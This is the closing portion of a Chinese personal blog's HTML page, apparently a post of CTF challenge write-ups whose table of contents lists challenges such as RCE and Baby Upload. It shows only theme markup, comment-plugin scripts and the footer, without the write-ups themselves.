    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="waline-comment-container">
        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@waline/client@v3.2.1/dist/waline.css"/>
        <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@waline/client@v3.2.1/dist/waline-meta.css"/>
        <div id="waline-comment"></div>
        <script data-pjax>
          window.KeepCommentPlugin.walineOptions = JSON.parse('{}'.replace(/&#34;/g, '"'))
          window.KeepCommentPlugin.walineOptions.el = '#waline-comment'
          window.KeepCommentPlugin.walineOptions.comment = '.post-comments-count'
          window.KeepCommentPlugin.walineOptions.serverURL = 'https://blog-waline-weld.vercel.app/'
          window.KeepCommentPlugin.walineOptions.lang = 'zh-CN' || 'zh-CN'
          window.KeepCommentPlugin.walineOptions.reaction = 'false' === 'true'
        </script>

        

        
            <script 
                    async
                    type="module"
            >
              import { init } from '//cdn.jsdelivr.net/npm/@waline/client@v3.2.1/dist/waline.js'
              window.KeepCommentPlugin.initWaline = () => {
                if (init) {
                  init(window.KeepCommentPlugin.walineOptions)
                  window.KeepCommentPlugin.hideLoading()
                } else {
                  setTimeout(() => {
                    window.KeepCommentPlugin.initWaline()
                  }, 1000)
                }
              }

              if ('false' === 'true') {
                setTimeout(() => {
                  window.KeepCommentPlugin.initWaline()
                }, 1200)
              } else {
                window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initWaline)
              }
            </script>
        
    </div>


        
    </div>





                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#NewStar2023-Begin-Of-PHP"><span class="nav-text">[NewStar2023]Begin Of PHP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NewStar2023-RCE"><span class="nav-text">[NewStar2023]RCE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GXYCTF2019-Baby-Upload"><span class="nav-text">[GXYCTF2019]Baby Upload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FSCTF2023-%E5%B7%B4%E5%B7%B4%E6%89%98%E6%96%AF"><span class="nav-text">[FSCTF2023]巴巴托斯</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GeekChallenge2023-ezhttp"><span class="nav-text">[GeekChallenge2023]ezhttp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LitCTF-2024-Misc"><span class="nav-text">[LitCTF 2024]Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AF%E5%B8%A7%E7%8F%8D%E7%8F%A0"><span class="nav-text">盯帧珍珠</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B6%90%E8%B4%AA%E6%81%8B%E5%92%8C%E4%BC%B1%E3%80%81%E7%94%BE%E2%80%95%E2%91%BAde%E6%AF%8E%E5%85%AE%E6%AF%8E%E7%A7%92"><span class="nav-text">涐贪恋和伱、甾―⑺dé毎兮毎秒</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%A0%E8%AF%B4%E5%BE%97%E5%AF%B9%EF%BC%8C%E4%BD%86"><span class="nav-text">你说得对，但__</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E9%93%81%EF%BC%8C%E5%90%AF%E5%8A%A8%EF%BC%81"><span class="nav-text">原铁，启动！</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Everywhere-We-Go"><span class="nav-text">Everywhere We Go</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2023</span>&nbsp;-&nbsp;2025
        
            &nbsp;</i>&nbsp;&nbsp;<a href="/">C3ngH</a>
        
    </div>

    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">80.2k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#NewStar2023-Begin-Of-PHP"><span class="nav-text">[NewStar2023]Begin Of PHP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#NewStar2023-RCE"><span class="nav-text">[NewStar2023]RCE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GXYCTF2019-Baby-Upload"><span class="nav-text">[GXYCTF2019]Baby Upload</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FSCTF2023-%E5%B7%B4%E5%B7%B4%E6%89%98%E6%96%AF"><span class="nav-text">[FSCTF2023]巴巴托斯</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GeekChallenge2023-ezhttp"><span class="nav-text">[GeekChallenge2023]ezhttp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LitCTF-2024-Misc"><span class="nav-text">[LitCTF 2024]Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%9B%AF%E5%B8%A7%E7%8F%8D%E7%8F%A0"><span class="nav-text">盯帧珍珠</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B6%90%E8%B4%AA%E6%81%8B%E5%92%8C%E4%BC%B1%E3%80%81%E7%94%BE%E2%80%95%E2%91%BAde%E6%AF%8E%E5%85%AE%E6%AF%8E%E7%A7%92"><span class="nav-text">涐贪恋和伱、甾―⑺dé毎兮毎秒</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%A0%E8%AF%B4%E5%BE%97%E5%AF%B9%EF%BC%8C%E4%BD%86"><span class="nav-text">你说得对，但__</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8E%9F%E9%93%81%EF%BC%8C%E5%90%AF%E5%8A%A8%EF%BC%81"><span class="nav-text">原铁，启动！</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Everywhere-We-Go"><span class="nav-text">Everywhere We Go</span></a></li></ol></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->

    
<script src="/js/local-search.js"></script>



<!-- lazyload -->

    
<script src="/js/lazyload.js"></script>



<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        
            
<script src="/js/post/toc.js"></script>

        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
